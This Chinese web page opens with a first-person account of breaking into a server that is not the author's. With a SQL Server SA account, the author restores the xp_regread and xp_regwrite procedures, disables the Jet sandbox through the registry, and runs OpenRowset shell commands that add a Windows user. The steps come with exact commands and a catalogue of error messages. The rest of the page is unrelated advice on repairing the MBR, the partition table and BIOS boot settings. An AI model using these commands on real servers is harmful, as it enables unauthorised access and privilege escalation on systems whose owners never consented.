通过重建方法获取webshell (常用的重建算法有哪三个)

获取webshell是黑客入侵 服务器 想要提权的必要手段，如何防止黑客获取webshell成为了安全管理员所要思考的问题。我们通过以下的入侵实例，使网络安全管理员能够分析入侵情况，避免黑客获取webshell的情况发生。

今天突然发现有一个SA权限。服务器管理员将大部份扩展都删除了。最后自己重建sp_makewebtask存储才搞到一个webshell了。

当然有了webshell，无法满足我们贪婪的欲望。开始测试提权。有serv-u，但是提权失败了。也许大家会说用back log来提权。但是那个太慢了，要重启机器，会影响对方业务，同时又会给对方留下不好的印像。有人也许会说用读取系统账号的注册表，导入导出，克隆账号，这个办法也可行，但由于并非黑对方主机，还是要保证对方系统的安整性比较好。(也许是心理因素，^_^)

最后只好试试沙盒模式。很多人SA直接用沙盒模式成功了好多机器，但我从来没实践过，也不太清楚成功率如何。只好拿他当回肉鸡尝试了。

由于扩展被删除，先恢复对注册表的读写存储。

dbcc addextendedproc (‘xp_regread’,’xpstar.dll’)

dbcc addextendedproc (‘xp_regwrite’,’xpstar.dll’)

修复沙盒的保护模式

exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,0;–

查看’SandBoxMode’值是否已经变成0了。

exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’, ‘SandBoxMode’

最后调用沙盒模式

select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=C:WINDOWSsystem32iasdnary.mdb’,’select shell(“cmd.exe /c NET user user passwd /add”)’)

1.如果沙盒保护模式未“关闭”，会报错：

服务器: 消息 7357，级别 16，状态 2，行 1

未能处理对象 ‘select shell(“cmd.exe /c net user user passwd /add”)’。OLE DB 提供程序 ‘microsoft.jet.oledb.4.0’ 指出该对象中没有任何列。

OLE DB 错误跟踪[Non-interface Error: OLE DB provider unable to process object, since the object has no columnsProviderName=’microsoft.jet.oledb.4.0′, Query=select shell(“cmd.exe /c net user user passwd /add”)’]。

2.如果.mdb不存在或是输入路径错误

服务器: 消息 7399，级别 16，状态 1，行 1

OLE DB 提供程序 ‘microsoft.jet.oledb.4.0’ 报错。

[OLE/DB provider returned message: 找不到文件 ‘C:WINDOWSsystem32iasdnary1.mdb’。]

OLE DB 错误跟踪[OLE/DB Provider ‘microsoft.jet.oledb.4.0’ IDBInitialize::Initialize returned 0x80004005: ]。

3.如果输入过程中多了一些空格，也会报错。尤其要注意这点，很多人直接网上找文章复制粘贴进去执行。

服务器: 消息 7357，级别 16，状态 2，行 1

未能处理对象 ‘select shell(“cmd.exe /c net user user passwd /add”)’。OLE DB 提供程序 ‘microsoft.jet.oledb.4.0’ 指出该对象中没有任何列。

OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName=’microsoft.jet.oledb.4.0′, Query=select shell(“cmd.exe /c net user user passwd /add”)’]。

4.如果mdb权限和cmd.exe权限不对，同样会也出现问题。

当mdb权限不对时，

服务器: 消息 7320，级别 16，状态 2，行 1

未能对 OLE DB 提供程序 ‘Microsoft.Jet.OLEDB.4.0’ 执行查询。

[OLE/DB provider returned message: 未知]

OLE DB 错误跟踪[OLE/DB Provider ‘Microsoft.Jet.OLEDB.4.0’ ICommandText::Execute returned 0x80040e14]。

5.如果net权限不对时，却没有任何提示。

最终的提权办法就是在当前的web目录下面上传系统的ias.mdb和cmd.exe，net.exe三个文件。执行

select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=E:webias.mdb’,’select shell(“E:webcmd.exe /c E:webnet.exe user user passwd /add”)’)

成功增加一个计算机用户。

通过重建方法获取webshell是一个可行的入侵手段，不过我们还是要提示大家，实例仅供参考，其最终目的还是希望企业安全管理员能够加强防护意识。

【编辑推荐】

电脑a disk read error occurred是什么意思

如果开机出现：a disk read error occurred 是说：磁盘读取错误,也就是说硬盘有可能接触不良,或者硬盘的主引导记（MBR）破坏,或者BIOS的第一启动项出错,造成无法引导系统,而造成的英文提示,处理方法如下:（做之前，最好是将电脑关机，打开机箱，将硬盘的数据线和硬盘的电源线重新拨插一下，这样可以排除因硬盘接触不良，造成读盘不出，而导至出现上面的英文界面。 如果插着U盘的把U盘也拨掉，有时插着U盘也会导至出现这样的英文画面）（笔记本这一步跳过）（1）造成你这个现象的主要原因是硬盘的主引导记录（MBR）出现错误或者损坏，所以你就要从重建主引导记录（MBR）入手，处理方法：首先要准备一张带PE的GHOST版的最新安装光盘，不管是XP还是WIN7,(一般软件店或者电脑店都有买￥5－8一张)或者准备一个带PE的U盘，接着开机按下F12键或者开机按下DEL进入到BIOS中，设好第一启动项为光驱（或者U盘），放入光盘（或者插入U盘），进入光盘中（或者U盘中），进入WINPE中，找到一个叫diskgenius的软件，打开这个软件，找到你的“硬盘”，选中你的硬盘，点右键，会弹出一个下拉列框，上面就有一个“重建主引导记录（MBR）”,你点击这个“重建主引导记录（MBR）”，然后就会弹出一个对话框，你点击“是”，然后弹出“任务成功完成”的对话框，你点“确定”，就可以修复主引导记录了。 然后重启电脑，电脑也就能够进操作系统了，百分之九十五可以解决问题。 （2）但有时候BIOS的第一启动项没有设置好也会导到无法引导系统：设置方法如下：执行以下步骤，更改系统启动顺序：1. 启动计算机。 2. 看到DELL画面时，按键进入系统设置界面。 3. 按<→>键，选择菜单栏中的Boot选项。 4. 按<↓>键，选择CD-ROM Drive选项。 5. 按<+>键。 将CD-ROM选项向上移动一格。 6. 再次按<+>键。 将CD-ROM移动至第一位置。 7. 将启动光盘放入光驱中。 8. 按键，保存并退出。 弹出Save changes and exit now提示框。 9. 按键。 计算机将从光驱中的光盘启动。 3）如果上面二种方法都试了还是不能进系统，哪就很有可能是系统也坏了，只能一键还原或者重装系统。

系统重启后无法识别硬盘

你不要听从无知之人的什么 “ 硬盘坏了 ， 什么大修 ” 之类的胡言乱语的误导 。 系统无法识别硬盘分析 ： 在 BIOS 里如果能够检测并识别硬盘 ， 但是 ， 通过光盘启动却找不到硬盘分区 ， 从这一点来看 ： 应当是硬盘的分区表被损坏了 。 因为硬盘分区表是用 Fdisk 或者其它的分区工具对硬盘进行分区时候建立的 ， 它的位置是在硬盘的 0 磁道 0 柱面 1 扇区的 。 硬盘分区表对于硬盘来说有非常重大的意义的 ， 它包含和规定了硬盘中有多少分区 ， 并且每一个分区的起始与终止扇区 ， 以及分区的大小和是否为活动分区等重要信息的 。 所以 ， 如果硬盘分区表被损坏 ， 那么 ， 操作系统就没有办法来识别硬盘分区 ， 并且 ， 硬盘中的数据也有可能面临着丢失的危险 ， 所以 ， 你要有所准备 。 【1】 处理 ： Disk Genius 它可以自动的搜索硬盘中的分区信息 ， 并能够将它进行恢复 ， 方法 ： 需要有一张带有 : Disk Genius 的 DOS 启动光盘引导系统进入到 DOS 状态 ， 然后 ， 再启动 : Disk Genius 的程序 。 【2 】 在程序的主界面中按下 ： Alt +T 组合键 来打开 “ 工具 ” 菜单项 ， 并选择 “ 重建分区表 ”命令 ， 这时 ， 就会弹出来一个对话框 ， 内容是提示你做好分区表的备份准备 ， 【 本人建议 ： 最好是在重建分区表之前 ， 就先对分区表做好备份 】 ， 回车 。 程序要求我们来选择操作方式 ， 选择 “ 交互方式 ” 回车 。 此时 ， 程序就开始进行搜索系统的分区信息 ， 并在发现信息分区后 ， 就会自动的弹出对话框 ， 内容就是 ： 要求选择处理方式的对话框 ， 你一定要选择 “ 保留 ” 然后 ， 回车 。 这时的程序还是在继续搜索分区 ，待所有的分区重新建立完后 ， 系统又会跳出一个对话框 ， 内容就是 ： 提示存盘 ， 选择存盘 ， 并退出 ： Disk Genius 。 【3】 重启你的电脑 ， 你就会发现搜索到的分区被你给复活了 。 好了 ， 兄弟 ， 再见 ！ 记住 ： 困难是人造成的 ， 人就会有办法解决它的 ， 不是吗 ？？？

联想台式机出现 error 1962: no operating system found.boot sequence will automatically repeat.

这是因为电脑缺少启动项，可以在BIOS中设置解决该问题，根据以下步骤操作设置。 工具：电脑。 1、打开电脑后显示此界面说明缺少引导项，此时将电脑重启。 2、重启电脑，按F1键进入setup界面，其他型号进入方式不同，可以根据开机画面提示操作。 3、点击当前界面右上角的restart。 4、将 OS Optimized Default 后面的Enable 改为Disabled，最后按F10键进行保存即可。